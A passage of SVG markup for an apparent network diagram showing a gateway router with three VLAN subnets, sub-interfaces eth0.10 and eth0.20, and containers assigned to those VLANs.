49.958 L 35.365 49.958 L 35.365 38.953 L 24.253 38.953 L 24.253 49.958 Z M 25.904 40.52 L 33.794 40.52 L 33.794 46.126 L 31.51 46.126 L 31.51 48.408 L 28.187 48.408 L 28.187 46.126 L 25.904 46.126 L 25.904 40.52 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 39.228 49.966 L 50.34 49.966 L 50.34 38.962 L 39.228 38.962 L 39.228 49.966 Z M 40.839 40.511 L 48.729 40.511 L 48.729 46.117 L 46.446 46.117 L 46.446 48.4 L 43.123 48.4 L 43.123 46.117 L 40.84 46.117 L 40.839 40.511 L 40.839 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 49.966 L 65.234 49.966 L 65.234 38.962 L 54.123 38.962 L 54.123 49.966 Z M 55.774 40.511 L 63.664 40.511 L 63.664 46.117 L 61.38 46.117 L 61.38 48.4 L 58.057 48.4 L 58.057 46.117 L 55.774 46.117 L 55.774 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 11.504 57.898 L 92.919 57.898 Q 92.919 57.898 92.919 57.898 L 92.919 62.69 Q 92.919 62.69 92.919 62.69 L 11.504 62.69 Q 11.504 62.69 11.504 62.69 L 11.504 57.898 Q 11.504 57.898 11.504 57.898 Z" opacity="0.7" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 85.525 18.936 L 5.082 18.936 C 4.255 18.936 3.582 19.609 3.582 20.436 L 3.582 53.397 C 3.582 54.224 4.255 54.897 5.082 54.897 L 11.504 54.897 L 92.919 54.897 L 99.082 54.897 C 99.909 54.897 100.582 54.224 100.582 53.397 L 100.582 34.526 C 92.561 33.543 86.232 27.039 85.525 18.936 Z M 20.389 49.95 L 9.278 49.95 L 9.278 38.944 L 20.39 38.944 L 20.389 49.95 L 20.389 49.95 Z M 20.389 35.006 L 9.278 35.006 L 9.278 24 L 20.39 24 L 20.389 35.006 L 20.389 35.006 Z M 35.365 49.958 L 24.253 49.958 L 24.253 38.953 L 35.365 38.953 L 35.365 49.958 Z M 35.365 35.015 L 24.253 35.015 L 24.253 24.009 L 35.365 24.009 L 35.365 35.015 Z M 39.188 24.009 L 50.3 24.009 L 50.3 35.014 L 39.188 35.014 L 39.188 24.009 Z M 50.34 49.966 L 39.228 49.966 L 39.228 38.962 L 50.34 38.962 L 50.34 49.966 Z M 65.234 49.966 L 54.123 49.966 L 54.123 38.962 L 65.234 38.962 L 65.234 49.966 Z M 65.234 35.023 L 54.123 35.023 L 54.123 24.018 L 65.234 24.018 L 65.234 35.023 Z M 77.286 39.723 C 75.493 39.723 74.039 38.269 74.039 36.476 C 74.039 34.683 75.493 33.229 77.286 33.229 C 79.079 33.229 80.533 34.683 80.533 36.476 C 80.533 38.269 79.08 39.723 77.286 39.723 Z M 89.541 39.723 C 87.748 39.723 86.294 38.269 86.294 36.476 C 86.294 34.683 87.748 33.229 89.541 33.229 C 91.334 33.229 92.788 34.683 92.788 36.476 C 92.787 38.269 91.334 39.723 89.541 39.723 Z" opacity="0.93" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,250,51)"><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="140" height="70" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="140" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="12">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="47" y="12">Router</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="83" y="12"> (</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="12">gateway</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="135" y="12">)</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="127" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="26">vlan10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="26"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="89" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="99" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="103" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="109" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="113" y="26">24</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="47" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="40">vlan20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="40"> -&#160;</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="46" y="28" width="74" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="40">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="40">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="83" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="86" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="96" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="103" y="40">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="106" y="40">24</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="47" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="54">vlan30</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="54"> -&#160;</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="46" y="42" width="61" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="54">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="54">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="54">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="54">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="54">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="79" y="54">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="83" y="54">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="89" y="54">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="54">16</text></g></g><g transform="matrix(1,0,0,1,48,60)"><g transform="translate(0,0)"><g transform="translate(-62,-55) translate(14,-5) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e06666" d="M 54 66 L 54 79 Q 54 89 64 89 L 78 89 Q 88 89 88 99 L 88 112" stroke-miterlimit="10" stroke-width="5"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,12.805718530101615,11.940280333547719)"><g><g transform="translate(0,0) scale(0.8417223432141461,0.83)"><g><g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 16.22 L -1.393 16.22 L -1.393 99.52 L 52.371 99.52" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 99.52 L 69.07 82.82 L 69.07 -0.48 L 19.98 -0.48 L -1.393 16.22 L 52.371 16.22 L 52.371 99.52 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 52.371 16.22 L 69.07 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 25.3 16.22 L 25.3 99.52" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 26.149 16.22 L 44.316 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 23.823 L 21.317 23.823 Q 21.317 23.823 21.317 23.823 L 21.317 34.868 Q 21.317 34.868 21.317 34.868 L 3.263 34.868 Q 3.263 34.868 3.263 34.868 L 3.263 23.823 Q 3.263 23.823 3.263 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 23.823 L 47.207 23.823 Q 47.207 23.823 47.207 23.823 L 47.207 34.868 Q 47.207 34.868 47.207 34.868 L 29.156 34.868 Q 29.156 34.868 29.156 34.868 L 29.156 23.823 Q 29.156 23.823 29.156 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 64.604 L 21.317 64.604 Q 21.317 64.604 21.317 64.604 L 21.317 75.648 Q 21.317 75.648 21.317 75.648 L 3.263 75.648 Q 3.263 75.648 3.263 75.648 L 3.263 64.604 Q 3.263 64.604 3.263 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 64.604 L 47.207 64.604 Q 47.207 64.604 47.207 64.604 L 47.207 75.648 Q 47.207 75.648 47.207 75.648 L 29.156 75.648 Q 29.156 75.648 29.156 75.648 L 29.156 64.604 Q 29.156 64.604 29.156 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 82.445 L 21.317 82.445 Q 21.317 82.445 21.317 82.445 L 21.317 93.49 Q 21.317 93.49 21.317 93.49 L 3.263 93.49 Q 3.263 93.49 3.263 93.49 L 3.263 82.445 Q 3.263 82.445 3.263 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 82.445 L 47.207 82.445 Q 47.207 82.445 47.207 82.445 L 47.207 93.49 Q 47.207 93.49 47.207 93.49 L 29.156 93.49 Q 29.156 93.49 29.156 93.49 L 29.156 82.445 Q 29.156 82.445 29.156 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g></g></g></g></g><g transform="matrix(1,0,0,1,66,73)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="41" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="12">10</text></g></g><g transform="matrix(1,0,0,1,67,52)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="41" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="12">20</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,7.386363636363733,108.14285409109937)"><g><g transform="translate(0,0) scale(1.7571428571428573,2.3636363636363638)"><g><g><g><path fill="#999999" stroke="rgb(0,0,0)" d="M 58.97 19.094 C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,170.65404609475036,143.99656534721677)"><g><g transform="translate(0,0) scale(0.44395492957746485,0.26378466557911767)"><g><path fill="url(#SeALyqvahCFZ)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.2524809014999616,3.790970933828097)"><path fill="none" stroke="none" d="M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#SeALyqvahCFZ)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,174.53252582967698,139.4965653472169)"><g transform="translate(0,0)"><g transform="translate(-177.7573249679898,-143.64485245977795) translate(3.224799138312818,4.148287112561064) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 179.03252582967698 143.9965653472169 L 179.03252582967698 170.37503190512842" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,202.11478334058148,139.4965653472165)"><g transform="translate(0,0)"><g transform="translate(-207.50230524967998,-145.05170400953324) translate(5.387521909098496,5.55513866231675) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 206.61478334058148 143.9965653472165 L 206.61478334058148 170.37503190512865" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,188.35179257362358,139.49656534721677)"><g transform="translate(0,0)"><g transform="translate(-191.5199277848912,-145.05170400953324) translate(3.168135211267611,5.555138662316466) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 192.85179257362358 143.99656534721677 L 192.85179257362358 170.37503190512854" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,141,177)"><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="28" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="12">container2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="12">vlan20</text></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="14" width="74" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="16" y="26">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="36" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="39" y="26">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="52" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="56" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="62" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="72" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="26">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,259.38636363636374,108.14285409109937)"><g><g transform="translate(0,0) scale(1.7571428571428573,2.3636363636363638)"><g><g><g><path fill="#999999" stroke="rgb(0,0,0)" d="M 58.97 19.094 C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,296.65404609475036,143.99656534721677)"><g><g transform="translate(0,0) scale(0.44395492957746485,0.26378466557911767)"><g><path fill="url(#KIKSmddbxdCC)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.2524809014999616,3.790970933828097)"><path fill="none" stroke="none" d="M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#KIKSmddbxdCC)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,300.53252582967696,139.4965653472169)"><g transform="translate(0,0)"><g transform="translate(-303.7573249679898,-143.64485245977795) translate(3.2247991383128465,4.148287112561064) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 305.03252582967696 143.9965653472169 L 305.03252582967696 170.37503190512842" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,328.1147833405815,139.4965653472165)"><g transform="translate(0,0)"><g transform="translate(-333.50230524968,-145.05170400953324) translate(5.387521909098496,5.55513866231675) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 332.6147833405815 143.9965653472165 L 332.6147833405815 170.37503190512865" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,314.3517925736236,139.49656534721677)"><g transform="translate(0,0)"><g transform="translate(-317.5199277848912,-145.05170400953324) translate(3.168135211267611,5.555138662316466) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 318.8517925736236 143.99656534721677 L 318.8517925736236 170.37503190512854" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,267,177)"><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="28" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="12">container3</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="12">vlan30</text></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="22" y="14" width="61" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="22" y="26">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="36" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="39" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" 